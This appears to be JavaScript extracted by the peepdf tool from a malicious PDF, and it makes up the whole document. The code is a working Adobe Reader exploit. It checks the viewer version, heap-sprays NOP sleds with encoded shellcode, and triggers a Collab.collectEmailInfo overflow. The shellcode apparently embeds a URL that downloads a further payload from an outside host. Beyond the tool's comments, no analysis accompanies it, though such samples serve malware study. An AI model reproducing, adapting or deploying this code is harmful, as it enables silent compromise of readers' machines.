// peepdf comment: Javascript code located in object 1 (version 0)

this.WKIGt1zV52Bq5G()

// peepdf comment: Javascript code located in object 13 (version 0)

function WKIGt1zV52Bq5G() {
    var oiN3st = new Array();

    function GhePaB(rX4cpKV, J1uLCkPT) {
        while (rX4cpKV.length * 2 < J1uLCkPT) {
            rX4cpKV += rX4cpKV;
        }
        rX4cpKV = rX4cpKV.substring(0, J1uLCkPT / 2);
        return rX4cpKV;
    }

    function lBYe4RRD96c() {
        var Hk1ooce = 0x0c0c0c0c;
        var SUS0On = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u772F%u7777%u772E%u6F6F%u6163%u6973%u6F6E%u632E%u6D6F%u732F%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3734%u3032%u7326%u6C70%u343D");
        var P5KvHT1uC = 0x400000;
        var hC7TpkcyF68 = SUS0On.length * 2;
        var J1uLCkPT = P5KvHT1uC - (hC7TpkcyF68 + 0x38);
        var rX4cpKV = unescape("%u9090%u9090");
        rX4cpKV = GhePaB(rX4cpKV, J1uLCkPT);
        var jTn7J9wJ2QOML = (Hk1ooce - 0x400000) / P5KvHT1uC;

        for (var uDpKp1 = 0; uDpKp1 < jTn7J9wJ2QOML; uDpKp1++) {
            oiN3st[uDpKp1] = rX4cpKV + SUS0On;
        }
    }

    function nMZ3eEEli5WK3() {
        var SAPJeDPxL = app.viewerVersion.toString();
        SAPJeDPxL = SAPJeDPxL.replace(/\D/g, "");
        var eNmfj9L = new Array(SAPJeDPxL.charAt(0), SAPJeDPxL.charAt(1), SAPJeDPxL.charAt(2));
        if ((eNmfj9L[0] == 8 && ((eNmfj9L[1] == 1 && eNmfj9L[2] < 2) || eNmfj9L[1] < 1)) || (eNmfj9L[0] == 7 && eNmfj9L[1] < 1) || (eNmfj9L[0] < 7)) {
            lBYe4RRD96c();
            var Kvc0ArvsvR = unescape("%u0c0c%u0c0c");
            while (Kvc0ArvsvR.length < 44952) Kvc0ArvsvR += Kvc0ArvsvR;
            this.collabStore = Collab.collectEmailInfo({
                subj: "",
                msg: Kvc0ArvsvR
            });
        }
    }
    nMZ3eEEli5WK3();
}

